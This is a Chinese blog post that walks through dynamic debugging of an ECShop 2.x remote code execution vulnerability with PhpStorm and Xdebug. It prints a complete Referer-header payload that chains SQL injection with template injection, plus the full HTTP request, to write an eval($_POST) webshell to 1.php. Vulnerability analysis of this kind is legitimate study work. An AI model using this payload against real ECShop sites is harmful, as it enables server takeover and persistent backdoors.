Ecshop2.x程式碼執行漏洞動態除錯分析
一、背景介紹
號稱國內最大的開源網店系統,可以直接遠端寫入webshell。
本文會通過動態分析來解析漏洞每個細節,關於漏洞原理可以看 ofollow,noindex" target="_blank">漏洞原理 ,講的很詳細,本文重點介紹動態分析審計的技巧和如何除錯漏洞,關於漏洞本身也是一個很值得學習的漏洞,能構造出這個攻擊鏈是需要對每個細節都有深刻的認識才能實現的。
二、動態除錯環境搭建
自行下載安裝phpstudy和phpstorm
首先確定php版本
然後修改配置檔案
修改php.ini中如下
[XDebug]
xdebug.profiler_append = 0 xdebug.profiler_enable = 1 xdebug.profiler_enable_trigger = 0 xdebug.profiler_output_dir ="C:\phpStudy\tmp\xdebug" xdebug.trace_output_dir ="C:\phpStudy\tmp\xdebug" xdebug.profiler_output_name = "cache.out.%t-%s" xdebug.remote_enable = 1 xdebug.remote_handler = "dbgp" xdebug.remote_host = "127.0.0.1" zend_extension="C:\phpStudy\php53\ext\xdebug.dll" xdebug.remote_port=9000 xdebug.idekey= PHPSTROM
設定php版本,一定要對應上
下面圖片是預設的不用動
下面的修改key和埠如下
在這裡配置根目錄除錯環境
這裡就留一個Chrome瀏覽器
Chrome瀏覽器要安裝外掛JetBrains IDE Support 下載安裝好了不用修改配置,這樣就基本可以了。
三、漏洞動態除錯分析
下面進行動態分析,動態分析的好處就是漏洞分析起來更加清晰。
下斷點這裡我們斷到了漏洞起始點方便分析每一個細節,然後點選debug,
然後瀏覽器會開啟
然後點選登入,會觸發斷點,可以看到停到了斷點處
下面介紹使用的一些快捷鍵:
f7會跟進函式 ,
f8 步出也就是一行一行走,不進入函式,有些迴圈或者不想看的函式直接f8,
進入函式後想跳出去就用shift+f8
Ctrl+art加 點選想要看的函式就會進入
Alt +f7 會搜尋誰呼叫了這個函式或者變數
筆者常用的就這些,掌握這些技能後就可以除錯
這裡HTTP_REFFER可控到賦值到$back_act
我們先用burp抓包測試下漏洞 ,先分析下payload
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
554fcae493e564ee0dc75bdf2ebf94caads 這串可以分解成兩塊,一個是554fcae493e564ee0dc75bdf2ebf94ca,一個是ads,ads是控制函式流程進入到insert_ads函式,554fcae493e564ee0dc75bdf2ebf94ca前面的這個就是個hash,後面會對它判斷,判斷後會把它去掉,沒有它是進入不了攻擊鏈的,後面再動態分析過程會介紹到。
後面的編碼部分解開是這樣
{$asd'];assert(base64_decode('file_put_contents('1.php','<?php eval($_POST[1337]); ?>')'));//}xxx
發包
GET /upload/user.php?act=login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10---";s:2:"id";s:3:"'/*";} Connection: close Upgrade-Insecure-Requests: 1
可以看的成功寫入webshell
然後我們繼續除錯,我們先一路f8走到這裡,然後再f7進入看看
這裡的關鍵點是insert_mod,動態呼叫,因為我們沒辦法抓包傳送payload測試,所以這裡面我們需要自己修改引數讓流程按照payload攻擊鏈來執行,攻擊鏈中需要執行insert_ads,下面的有個hash判斷
下面的可以看到有這個hash,所以這裡不需要控制,然後繼續流程
下面圖片中會把hash去掉然後剩下$k,$k中的1,3,5,7都可以控制,所以這裡我們在1修改它的值為我們的payload,右鍵點選setvalue
把這payload重新複製,右鍵setValue,這裡直接複製會報錯,還是一點點修改吧,然後雙引號要轉義
ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}
繼續f7進入到insert_mod裡面,然後發現,insert_ads函式已經控制了,但是payload被反序列化時候$para為false,說明我們的payload有問題,點選debug重新來。
換了個位置修改,在反序列化函式之前修改,下面圖片可以看到$para有值了,是我們的payload
繼續走來到了insert_ads,一路f8,讓我們的payload代入進了變數num
最後拼接成了這樣
繼續往下走,一路f8來到這裡
然後f7進入看看,會把payload代入_eval程式碼執行函式,在這裡payload還會被fetch_str處理,f7進入看看
F8來到這裡,在這裡之前source都沒有變化,經過了preg_replace會處理掉{
payload變成$asd’;]assertxxx 代入到了select裡
這個select函式跟入不進去,只能靜態分析下了,可以這樣尋找ctrl+shift+f
在select中進入了get_val,substr去掉了$
Payload變成了:asd’;]assertXXX
進入到了make_var
最後拼接到了
最終payload變成
$this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']
最後來到eval
